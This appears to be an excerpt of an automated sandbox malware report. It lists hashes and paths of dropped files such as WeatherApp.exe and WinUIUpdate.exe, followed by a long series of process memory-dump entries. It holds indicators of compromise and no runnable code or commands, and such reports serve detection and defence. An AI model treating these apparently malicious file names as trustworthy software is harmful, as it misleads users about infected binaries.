30KB
MD5e85b025a7d074abc82a9d3eea402e1e5
SHA17ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d
SHA25626bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2
SHA512c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5
-
\Users\Admin\AppData\Local\Temp\WeatherApp.exeFilesize
30KB
MD5e85b025a7d074abc82a9d3eea402e1e5
SHA17ff1e6e8e2a048ae9141a3a1b5b8e530635eb96d
SHA25626bbc68fabf3b045f726333c4445a27204d92d7849ec05f0242aaa8d0ffc70f2
SHA512c431c29c04300f565d48c228dff184a50d3276d8101fb44f5410a59a21534aecd7eb22e800ef2008eb293c7008736a4afcc354d5ddb717b46d4262da6c3c7ac5
-
\Users\Admin\AppData\Roaming\1000158000\WinUIUpdate.exeFilesize
3.7MB
MD5b0a84e4330a9c00c57d3a3e7885f7946
SHA1bfe5f9b94081c25827e2bc90bb39a8c701033519
SHA2566320b40b4809bd711e6a50eebacce6ac51d3cbb92f84d467116f79489c668a04
SHA512a2214e9f6ca3b9a1aa35e2dbe8d7439ee6958e20a2bdd520a9b29693b5d0eb930bd7d26b818aad5e032ca455eb879543598dcb72e06f69775b9877ac28e77a8f
-
memory/108-307-0x0000000002404000-0x0000000002407000-memory.dmpFilesize
12KB
-
memory/108-308-0x000000000240B000-0x0000000002442000-memory.dmpFilesize
220KB
-
memory/108-306-0x00000000023A0000-0x00000000023A8000-memory.dmpFilesize
32KB
-
memory/108-305-0x000000001B0B0000-0x000000001B392000-memory.dmpFilesize
2.9MB
-
memory/416-333-0x0000000000380000-0x00000000003A1000-memory.dmpFilesize
132KB
-
memory/416-340-0x0000000037710000-0x0000000037720000-memory.dmpFilesize
64KB
-
memory/416-336-0x0000000000850000-0x0000000000877000-memory.dmpFilesize
156KB
-
memory/416-334-0x0000000000380000-0x00000000003A1000-memory.dmpFilesize
132KB
-
memory/416-337-0x000007FEBECB0000-0x000007FEBECC0000-memory.dmpFilesize
64KB
-
memory/464-344-0x0000000000240000-0x0000000000267000-memory.dmpFilesize
156KB
-
memory/472-346-0x00000000001C0000-0x00000000001E7000-memory.dmpFilesize
156KB
-
memory/564-318-0x0000000001060000-0x00000000010A0000-memory.dmpFilesize
256KB
-
memory/564-317-0x0000000001060000-0x00000000010A0000-memory.dmpFilesize
256KB
-
memory/804-312-0x000000013F270000-0x000000013F631000-memory.dmpFilesize
3.8MB
-
memory/804-287-0x000000013F270000-0x000000013F631000-memory.dmpFilesize
3.8MB
-
memory/812-330-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/812-329-0x00000000774B0000-0x00000000775CF000-memory.dmpFilesize
1.1MB
-
memory/812-328-0x00000000776D0000-0x0000000077879000-memory.dmpFilesize
1.7MB
-
memory/812-327-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/812-325-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/816-54-0x0000000000D90000-0x0000000000DB2000-memory.dmpFilesize
136KB
-
memory/816-60-0x0000000000CC0000-0x0000000000D00000-memory.dmpFilesize
256KB
-
memory/816-55-0x0000000000CC0000-0x0000000000D00000-memory.dmpFilesize
256KB
-
memory/1456-75-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-79-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-204-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-80-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-212-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-179-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-78-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-270-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-77-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-81-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/1456-187-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-87-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-82-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-265-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-76-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1456-85-0x0000000000400000-0x000000000043D000-memory.dmpFilesize
244KB
-
memory/1716-297-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/1716-293-0x000000001B090000-0x000000001B372000-memory.dmpFilesize
2.9MB
-
memory/1716-296-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/1716-295-0x0000000002480000-0x0000000002500000-memory.dmpFilesize
512KB
-
memory/1716-294-0x0000000001E20000-0x0000000001E28000-memory.dmpFilesize
32KB
-
memory/1872-313-0x0000000140000000-0x0000000140029000-memory.dmpFilesize
164KB
-
memory/1932-321-0x00000000010B0000-0x00000000010D6000-memory.dmpFilesize
152KB
-
memory/1932-316-0x0000000001350000-0x00000000013D0000-memory.dmpFilesize
512KB
-
memory/1932-322-0x00000000776D0000-0x0000000077879000-memory.dmpFilesize
1.7MB
-
memory/1932-323-0x0000000001350000-0x00000000013D0000-memory.dmpFilesize
512KB
-
memory/1932-324-0x00000000774B0000-0x00000000775CF000-memory.dmpFilesize
1.1MB
-
memory/1932-320-0x0000000001350000-0x00000000013D0000-memory.dmpFilesize
512KB
-
memory/1932-319-0x0000000001350000-0x00000000013D0000-memory.dmpFilesize
512KB
-
memory/1932-315-0x0000000000A40000-0x0000000000A48000-memory.dmpFilesize
32KB
-
memory/1932-314-0x0000000019CE0000-0x0000000019FC2000-memory.dmpFilesize
2.9MB
-
memory/2000-70-0x0000000000990000-0x00000000009BE000-memory.dmpFilesize
184KB
-
memory/2000-68-0x0000000001310000-0x000000000131E000-memory.dmpFilesize
56KB
-
memory/2000-69-0x0000000000470000-0x00000000004B0000-memory.dmpFilesize
256KB
-
memory/2000-71-0x0000000000400000-0x0000000000408000-memory.dmpFilesize
32KB
-
memory/2000-73-0x0000000000B30000-0x0000000000B38000-memory.dmpFilesize
32KB
-
memory/2000-86-0x0000000000475000-0x0000000000493000-memory.dmpFilesize
120KB
-
memory/2012-58-0x0000000002570000-0x00000000025B0000-memory.dmpFilesize
256KB
-
memory/2012-59-0x0000000002570000-0x00000000025B0000-memory.dmpFilesize
256KB